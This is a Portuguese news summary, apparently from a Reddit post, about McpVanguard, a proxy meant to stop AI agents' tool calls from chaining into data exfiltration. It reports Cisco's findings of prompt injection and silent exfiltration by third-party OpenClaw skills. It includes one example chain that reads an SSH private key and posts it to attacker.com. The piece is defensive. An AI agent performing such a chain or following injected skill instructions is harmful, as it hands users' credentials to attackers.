McpVanguard: Proxy Bloqueia Exfiltração de Dados do OpenClaw

Em resposta à descoberta da equipe de segurança de IA da Cisco de que habilidades de terceiros do OpenClaw realizavam exfiltração silenciosa de dados e injeção de prompt, um desenvolvedor lançou o McpVanguard, um proxy projetado para ficar entre um agente de IA e suas ferramentas para bloquear chamadas maliciosas antes que sejam executadas.

O Problema: Chamadas Maliciosas em Cadeia

A questão de segurança não é um bug no próprio OpenClaw, mas uma consequência dos agentes terem acesso ao sistema de arquivos, execução de shell e chamadas de rede sem limites de aplicação. Os testes da Cisco revelaram um padrão em que chamadas individuais aparentemente inocentes se combinam para criar uma violação, como:

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

Nenhuma das chamadas parece maliciosa isoladamente, mas juntas elas exfiltram dados sensíveis. De acordo com a fonte, o ClawHub teve mais de 820 habilidades maliciosas em seu pico, e o CVE-2026-25253 permitia que atacantes alcançassem execução remota de código através de um único link malicioso. A validação atual no nível de habilidade falha em detectar essas sequências de chamadas em cadeia.

A Solução: Proxy McpVanguard

O McpVanguard aborda isso interceptando chamadas entre o agente e suas ferramentas. Ele usa três métodos de detecção:

Correspondência de padrões
Pontuação de intenção semântica
Detecção de cadeias comportamentais em toda a sessão

A instalação é via pip: pip install mcp-vanguard.

Camada Mais Profunda: Protocolo VEX

O projeto inclui uma camada de segurança mais profunda chamada Protocolo VEX, descrita como um sistema de "gravador de voo". Ele fornece:

Trilhas de auditoria Merkle para registro à prova de adulteração
Verificação de identidade do agente baseada em TPM
Aplicação no nível de chamada do sistema

O Protocolo VEX é construído em Rust e o desenvolvimento começou em dezembro de 2023, antes que o OpenClaw ganhasse popularidade generalizada. A fonte observa que a NVIDIA recentemente lançou o NemoClaw para fins de segurança semelhantes, indicando que esse tipo de ameaça não vai desaparecer.

Ambos os projetos estão disponíveis no GitHub:

📖 Read the full source: r/openclaw